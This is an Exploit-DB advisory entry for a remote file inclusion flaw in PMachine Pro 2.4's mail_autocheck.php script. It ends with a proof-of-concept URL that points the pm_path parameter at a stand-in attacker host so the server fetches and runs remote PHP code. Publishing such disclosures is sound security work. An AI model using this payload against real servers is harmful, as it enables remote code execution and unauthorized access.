PMachine Pro 2.4 - Remote File Inclusion

EDB-ID:

25127


Author:

kc

Type:

webapps


Platform:

PHP

Date:

2005-02-19


source: https://www.securityfocus.com/bid/12597/info

PMachine Pro is reported prone to a remote file include vulnerability.

This issue affects the 'mail_autocheck.php' script.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This will facilitate unauthorized access.

The latest version (2.4) of pMachine Pro is reported vulnerable. It is possible that other versions are affected as well. 

http://www.example.com/pMachine/pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://attackers-webserver/malicious-code.php?